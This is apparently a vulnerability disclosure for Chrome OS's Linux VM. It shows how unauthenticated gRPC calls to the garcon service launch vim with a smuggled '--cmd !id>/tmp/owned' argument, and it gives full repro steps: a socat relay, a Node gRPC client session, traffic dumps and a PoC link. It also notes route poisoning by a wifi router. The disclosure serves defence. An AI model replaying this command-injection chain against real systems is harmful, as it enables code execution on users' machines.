======================= BUG DESCRIPTION =======================
There are a variety of RPC communication channels between the Chrome OS host
system and the crosvm guest. This bug report focuses on communication on TCP
port 8889, which is used by the "garcon" service.
Among other things, garcon is responsible for:
- sending URLs to be opened from the guest to the host
- telling the host which applications (more precisely, .desktop files) are
installed in the guest, so that the host can display them in the launcher
- telling the guest to launch applications when the user clicks on stuff in the
launcher
garcon uses gRPC, which is an RPC protocol that sends protobufs over plaintext
HTTP/2. (Other system components communicate with the VM over gRPC-over-vsock,
but garcon uses gRPC-over-TCP.) For some command types, the TCP connection is
initiated by the host; for others, it is initiated by the guest. Both guest and
host are listening on [::]:8889; however, the iptables rules of the host prevent
an outside host from simply connecting to those sockets.
However, Chrome OS apps running on the host (and I think also Android apps, but
I haven't tested that) are not affected by such restrictions. This means that a
Chrome OS app with the "Exchange data with any device on the local network or
internet" permission can open a gRPC socket to the guest's garcon (no
authentication required) and send a vm_tools.container.Garcon.LaunchApplication
RPC call to the guest. This RPC call takes two arguments:
// Request protobuf for launching an application in the container.
message LaunchApplicationRequest {
  // The ID of the application to launch. This should correspond to an
  // identifier for a .desktop file available in the container.
  string desktop_file_id = 1;
  // Files to pass as arguments when launching the application, if any, given
  // as absolute paths within the container's filesystem.
  repeated string files = 2;
}
"desktop_file_id" is actually a relative path to a .desktop file without the
".desktop". One preinstalled .desktop file in the VM is for the VIM editor.
"files" is an array of "paths" that should be provided to the application as
arguments - but actually, you can just pass in arbitrary arguments this way.
This only works for applications whose .desktop files permit passing arguments,
but vim.desktop does permit that.
VIM permits passing a VIM command to be executed on startup using the "--cmd"
flag, and a VIM command that starts with an exclamation mark is interpreted as
a shell command.
So in summary, you can execute arbitrary shell commands by sending a gRPC call
like this to the VM:
vm_tools.container.Garcon.LaunchApplication({
  desktop_file_id: 'vim',
  files: [
    '--cmd',
    '!id>/tmp/owned'
  ]
})
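For reference, the serialized form of this request is tiny. The following
sketch (plain Node, no external dependencies; written for illustration, not
part of the original PoC) hand-encodes the same LaunchApplicationRequest and
prints the bytes that later show up inside an HTTP/2 DATA frame in the traffic
dump under REPRO INSTRUCTIONS:
// Hand-encode LaunchApplicationRequest{desktop_file_id:'vim', files:['--cmd','!id>/tmp/owned']}.
// Every string here is shorter than 128 bytes, so each varint fits in a single byte.
function lenDelimited(fieldNumber, str) {
  const data = Buffer.from(str, 'utf8');
  // tag byte: (field_number << 3) | wire type 2 (length-delimited)
  return Buffer.concat([Buffer.from([(fieldNumber << 3) | 2, data.length]), data]);
}
const msg = Buffer.concat([
  lenDelimited(1, 'vim'),            // desktop_file_id = 1
  lenDelimited(2, '--cmd'),          // files = 2 (repeated; one tag per entry)
  lenDelimited(2, '!id>/tmp/owned'),
]);
console.log(msg.toString('hex'));
// -> 0a0376696d12052d2d636d64120e2169643e2f746d702f6f776e6564 (28 bytes)
On the wire, gRPC prefixes this with a one-byte compression flag (00) and a
four-byte big-endian length (00 00 00 1c), which is exactly the
"00 00 00 00 1c 0a 03 76 69 6d ..." sequence visible in the forwarder output
below.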
For my PoC, since I didn't want to try directly speaking gRPC from inside a
Chrome app, I instead built an app that forwards the garcon port to the outside
network, and then connected to garcon from a normal Linux workstation.
Repro instructions are at the bottom of this bug report, under
"REPRO INSTRUCTIONS", but first I'll list a few other things about crosvm that
look interesting from a security perspective.
Because of this issue, and because of the routing issue described below, I
strongly recommend getting rid of TCP-based communication with the VM entirely.
The various other inter-VM socket types that are already used should be more
than sufficient.
======================= RANDOM OBSERVATIONS =======================
This section lists a bunch of things that I haven't written full PoCs for so far,
but that look interesting or bad from a security perspective:
------------------- ROUTING TABLE -------------------
It is possible for a malicious wifi router to receive packets that the
host-side garcon RPC endpoint sends towards the VM. You might be able to
attack a Chrome OS device over the network using this, but I haven't fully
tested it yet.
Normally, when you connect the Chrome OS device to a wifi network, the routing
table looks as follows:
localhost / # route -n
Kernel IP routing table
Destination      Gateway          Genmask          Flags  Metric  Ref  Use  Iface
0.0.0.0          192.168.246.1    0.0.0.0          UG     1       0    0    wlan0
100.115.92.0     0.0.0.0          255.255.255.252  U      0       0    0    arcbr0
100.115.92.4     0.0.0.0          255.255.255.252  U      0       0    0    vmtap0
100.115.92.192   100.115.92.6     255.255.255.240  UG     0       0    0    vmtap0
192.168.246.0    0.0.0.0          255.255.255.0    U      0       0    0    wlan0
Routing precedence depends on prefix length; more specific routes take
precedence over less specific ones (including the default route). The
100.115.92.192/28 route is the most specific one for traffic to the VM at
100.115.92.204, so that is the route used for RPC calls to that IP address.
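To make the precedence rule concrete, here is a minimal longest-prefix-match
sketch in plain Node (written for illustration; the route entries are
abbreviated copies of the tables in this report):
// Pick the route for a destination the way the kernel does: longest matching prefix wins.
function ipToInt(ip) {
  return ip.split('.').reduce((acc, octet) => ((acc << 8) | parseInt(octet, 10)) >>> 0, 0);
}
function prefixLen(mask) {
  // number of leading 1-bits in a dotted-quad netmask
  return ipToInt(mask).toString(2).split('1').length - 1;
}
function pickRoute(routes, destIp) {
  const dest = ipToInt(destIp);
  let best = null;
  for (const r of routes) {
    const mask = ipToInt(r.genmask);
    if (((dest & mask) >>> 0) === ((ipToInt(r.destination) & mask) >>> 0) &&
        (best === null || prefixLen(r.genmask) > prefixLen(best.genmask))) {
      best = r;
    }
  }
  return best;
}
// Normal table (abbreviated): the /28 route to vmtap0 wins for the VM's address.
const normal = [
  { destination: '0.0.0.0',        genmask: '0.0.0.0',         iface: 'wlan0'  },
  { destination: '100.115.92.192', genmask: '255.255.255.240', iface: 'vmtap0' },
];
console.log(pickRoute(normal, '100.115.92.204').iface);   // -> vmtap0
// With the router-supplied 100.115.92.200/29 route added (see below), wlan0 wins instead.
const poisoned = normal.concat([
  { destination: '100.115.92.200', genmask: '255.255.255.248', iface: 'wlan0' },
]);
console.log(pickRoute(poisoned, '100.115.92.204').iface); // -> wlan0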
However, the wifi router can supply routing information that influences the
routing table. By modifying the wifi router's settings and reconnecting the
Chrome OS device, I get the following routing table in Chrome OS:
localhost / # route -n
Kernel IP routing table
Destination      Gateway          Genmask          Flags  Metric  Ref  Use  Iface
0.0.0.0          100.115.92.201   0.0.0.0          UG     1       0    0    wlan0
8.8.8.8          100.115.92.201   255.255.255.255  UGH    0       0    0    wlan0
100.115.92.0     0.0.0.0          255.255.255.252  U      0       0    0    arcbr0
100.115.92.4     0.0.0.0          255.255.255.252  U      0       0    0    vmtap0
100.115.92.192   100.115.92.6     255.255.255.240  UG     0       0    0    vmtap0
100.115.92.200   0.0.0.0          255.255.255.248  U      0       0    0    wlan0
Now the 100.115.92.200/29 route pointing to wlan0 takes precedence over the
legitimate 100.115.92.192/28 route. I then told my router to respond to ARP
queries for 100.115.92.204 (the VM's IP) and ran wireshark on the wifi router
while connecting the ChromeOS device to it. I observed a TCP ACK packet coming
in on port 8889, from 100.115.92.5, with the following payload:
00000000 00 00 19 01 04 00 00 00 09 c7 c6 be c4 c3 c2 c1 ........ ........
00000010 c0 00 0c 67 72 70 63 2d 74 69 6d 65 6f 75 74 02 ...grpc- timeout.
00000020 32 53 00 00 2S..
I also got a TCP SYN packet on port 2222 (that's the port on which OpenSSH
listens in the VM).
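For what it's worth, the first 9 bytes of the port-8889 payload above are a
standard HTTP/2 frame header; decoding them (a small sketch in plain Node,
written for illustration) confirms that the leaked traffic is the host-side
gRPC client talking to what it believes is the VM:
// Decode the 9-byte HTTP/2 frame header at the start of the captured payload.
const FRAME_TYPES = { 0: 'DATA', 1: 'HEADERS', 4: 'SETTINGS', 6: 'PING', 8: 'WINDOW_UPDATE' };
function decodeFrameHeader(buf) {
  return {
    length:   (buf[0] << 16) | (buf[1] << 8) | buf[2],  // 24-bit payload length
    type:     FRAME_TYPES[buf[3]] || buf[3],
    flags:    buf[4],
    streamId: buf.readUInt32BE(5) & 0x7fffffff,         // 31-bit stream identifier
  };
}
console.log(decodeFrameHeader(Buffer.from('000019010400000009', 'hex')));
// -> { length: 25, type: 'HEADERS', flags: 4, streamId: 9 }
So this is a HEADERS frame (flags 0x04 = END_HEADERS) on stream 9, and its
HPACK payload contains, among other things, the literal "grpc-timeout: 2S"
visible in the ASCII column above - i.e. request headers from the host-side
gRPC client end up on the attacker-controlled network.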
------------------- SSHFS -------------------
When the user wishes to access the guest's filesystem from the host, sshfs is
used - a FUSE filesystem that uses ssh to interact with sftp-server on the
remote side.
sshfs runs with CAP_SYS_CHOWN, CAP_SETGID, CAP_SETUID and CAP_SYS_ADMIN, and
those privileges are even inherited by the ssh process.
------------------- VIRTIO WAYLAND -------------------
The crosvm host process implements a virtio protocol for Wayland. This is
described as follows in the guest kernel driver:
* Virtio Wayland (virtio_wl or virtwl) is a virtual device that allows a guest
* virtual machine to use a wayland server on the host transparently (to the
* host). This is done by proxying the wayland protocol socket stream verbatim
* between the host and guest over 2 (recv and send) virtio queues. The guest
* can request new wayland server connections to give each guest wayland client
* a different server context. Each host connection's file descriptor is exposed
* to the guest as a virtual file descriptor (VFD). Additionally, the guest can
* request shared memory file descriptors which are also exposed as VFDs. These
* shared memory VFDs are directly writable by the guest via device memory
* injected by the host. Each VFD is sendable along a connection context VFD and
* will appear as ancillary data to the wayland server, just like a message from
* an ordinary wayland client. When the wayland server sends a shared memory
* file descriptor to the client (such as when sending a keymap), a VFD is
* allocated by the device automatically and its memory is injected into the
* guest as device memory.
Note the "verbatim" - as far as I can tell, the host component is not filtering
anything, but just plumbs the wayland traffic straight into the
/run/chrome/wayland-0 socket, on which the chrome browser process is listening.
If I read the code correctly, the low-level parsing of wayland RPCs is then
performed using the C code in libwayland, while the high-level handling of a
bunch of RPCs is done in C++ code in Chrome in src/components/exo/wayland/.
======================= REPRO INSTRUCTIONS =======================
Tested on: "10820.0.0 (Official Build) dev-channel eve"
Switch your Chrome OS victim machine to the dev channel so that the Linux VM
feature becomes available.
Set up a wifi network on which direct connections between machines are permitted,
and connect the victim device to it.
Open the Chrome OS settings. Enable "Linux (Beta)", wait for the install process
to complete, then launch crosvm by clicking the Terminal icon in the launcher.
In the guest OS terminal, determine the container's IP address with "ip addr".
For me, the address is 100.115.92.204, but it seems to change when you
reinstall the container.
On the attacker machine, run
"socat -d TCP-LISTEN:1335,reuseaddr TCP-LISTEN:1336,reuseaddr".
This is just a TCP server that copies data between a client on TCP port 1335
(must connect first) and a client on TCP port 1336.
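If socat is not at hand, the same relay can be sketched in a few lines of Node
(this is just an illustration of what the socat command does, not part of the
original PoC):
// Accept one client on :1335 (the forwarder app) and one on :1336 (the gRPC
// client), then copy bytes between them in both directions. Unlike the socat
// command above, this sketch does not care which side connects first.
const net = require('net');
let forwarder = null, grpcClient = null;
function maybePipe() {
  if (forwarder && grpcClient) {
    forwarder.pipe(grpcClient);
    grpcClient.pipe(forwarder);
  }
}
net.createServer(sock => { forwarder = sock; maybePipe(); }).listen(1335);
net.createServer(sock => { grpcClient = sock; maybePipe(); }).listen(1336);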
On the host, unzip garcon_forwarder.zip and load it as an unpacked app. Then
open "garcon forwarder" from the launcher, fill in the correct IP addresses, and
press "run". You should see a little bit of hexdump appearing in the app.
On the attacker machine, install nodejs, then, in a folder containing
container_guest.proto:
$ npm install grpc
[...]
$ npm install @grpc/proto-loader
[...]
$ node
> var grpc = require('grpc');
undefined
> var protoLoader = require('@grpc/proto-loader');
undefined
> var packageDefinition = protoLoader.loadSync('./container_guest.proto', {keepCase: true, longs: String, enums: String, defaults: true, oneofs: true});
undefined
> var protoDescriptor = grpc.loadPackageDefinition(packageDefinition);
undefined
> var stub = new protoDescriptor.vm_tools.container.Garcon('localhost:1336', grpc.credentials.createInsecure());
undefined
> stub.launchApplication({desktop_file_id:'vim',files:['--cmd','!id>/tmp/owned']}, function() {console.log(arguments)});
ClientUnaryCall {
  domain:
   Domain {
     domain: null,
     _events:
      { removeListener: [Function: updateExceptionCapture],
        newListener: [Function: updateExceptionCapture],
        error: [Function: debugDomainError] },
     _eventsCount: 3,
     _maxListeners: undefined,
     members: [] },
  _events: {},
  _eventsCount: 0,
  _maxListeners: undefined,
  call:
   InterceptingCall {
     next_call: InterceptingCall { next_call: null, requester: [Object] },
     requester: undefined } }
> [Arguments] { '0': null, '1': { success: true, failure_reason: '' } }
At this point, in the garcon forwarder app, you should see this:
activating...
connected to garcon over socket 16
connected to attacker over socket 17
on socket 16, received:
00 00 12 04 00 00 00 00 00 00 04 00 00 ff ff 00 |................|
06 00 00 40 00 fe 03 00 00 00 01 00 00 04 08 00 |...@............|
00 00 00 00 7f ff 00 00 |........|
on socket 17, received:
50 52 49 20 2a 20 48 54 54 50 2f 32 2e 30 0d 0a |PRI * HTTP/2.0..|
0d 0a 53 4d 0d 0a 0d 0a 00 00 24 04 00 00 00 00 |..SM......$.....|
00 00 02 00 00 00 00 00 03 00 00 00 00 00 04 00 |................|
40 00 00 00 05 00 40 00 00 00 06 00 00 20 00 fe |@.....@...... ..|
03 00 00 00 01 00 00 04 08 00 00 00 00 00 00 3f |...............?|
00 01 00 00 08 06 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 |...|
on socket 17, received:
00 01 2b 01 04 00 00 00 01 40 07 3a 73 63 68 65 |..+......@.:sche|
6d 65 04 68 74 74 70 40 07 3a 6d 65 74 68 6f 64 |me.http@.:method|
04 50 4f 53 54 40 0a 3a 61 75 74 68 6f 72 69 74 |.POST@.:authorit|
79 0e 6c 6f 63 61 6c 68 6f 73 74 3a 31 33 33 36 |y.localhost:1336|
40 05 3a 70 61 74 68 2c 2f 76 6d 5f 74 6f 6f 6c |@.:path,/vm_tool|
73 2e 63 6f 6e 74 61 69 6e 65 72 2e 47 61 72 63 |s.container.Garc|
6f 6e 2f 4c 61 75 6e 63 68 41 70 70 6c 69 63 61 |on/LaunchApplica|
74 69 6f 6e 40 02 74 65 08 74 72 61 69 6c 65 72 |tion@.te.trailer|
73 40 0c 63 6f 6e 74 65 6e 74 2d 74 79 70 65 10 |s@.content-type.|
61 70 70 6c 69 63 61 74 69 6f 6e 2f 67 72 70 63 |application/grpc|
40 0a 75 73 65 72 2d 61 67 65 6e 74 3c 67 72 70 |@.user-agent<grp|
63 2d 6e 6f 64 65 2f 31 2e 31 33 2e 30 20 67 72 |c-node/1.13.0 gr|
70 63 2d 63 2f 36 2e 30 2e 30 2d 70 72 65 31 20 |pc-c/6.0.0-pre1 |
28 6c 69 6e 75 78 3b 20 63 68 74 74 70 32 3b 20 |(linux; chttp2; |
67 6c 6f 72 69 6f 73 61 29 40 14 67 72 70 63 2d |gloriosa)@.grpc-|
61 63 63 65 70 74 2d 65 6e 63 6f 64 69 6e 67 15 |accept-encoding.|
69 64 65 6e 74 69 74 79 2c 64 65 66 6c 61 74 65 |identity,deflate|
2c 67 7a 69 70 40 0f 61 63 63 65 70 74 2d 65 6e |,gzip@.accept-en|
63 6f 64 69 6e 67 0d 69 64 65 6e 74 69 74 79 2c |coding.identity,|
67 7a 69 70 00 00 04 08 00 00 00 00 01 00 00 00 |gzip............|
05 00 00 21 00 01 00 00 00 01 00 00 00 00 1c 0a |...!............|
03 76 69 6d 12 05 2d 2d 63 6d 64 12 0e 21 69 64 |.vim..--cmd..!id|
3e 2f 74 6d 70 2f 6f 77 6e 65 64 00 00 04 08 00 |>/tmp/owned.....|
00 00 00 00 00 00 00 05 |........|
on socket 16, received:
00 00 00 04 01 00 00 00 00 00 00 08 06 01 00 00 |................|
00 00 00 00 00 00 00 00 00 00 |..........|
on socket 16, received:
00 00 58 01 04 00 00 00 01 40 07 3a 73 74 61 74 |..X......@.:stat|
75 73 03 32 30 30 40 0c 63 6f 6e 74 65 6e 74 2d |us.200@.content-|
74 79 70 65 10 61 70 70 6c 69 63 61 74 69 6f 6e |type.application|
2f 67 72 70 63 40 14 67 72 70 63 2d 61 63 63 65 |/grpc@.grpc-acce|
70 74 2d 65 6e 63 6f 64 69 6e 67 15 69 64 65 6e |pt-encoding.iden|
74 69 74 79 2c 64 65 66 6c 61 74 65 2c 67 7a 69 |tity,deflate,gzi|
70 00 00 07 00 00 00 00 00 01 00 00 00 00 02 08 |p...............|
01 00 00 0f 01 05 00 00 00 01 40 0b 67 72 70 63 |..........@.grpc|
2d 73 74 61 74 75 73 01 30 |-status.0|
Now, in the Linux VM, you can see the created file:
gjannhtest1@penguin:~$ cat /tmp/owned
uid=1000(gjannhtest1) gid=1000(gjannhtest1) groups=1000(gjannhtest1),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),44(video),46(plugdev),100(users)
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45407.zip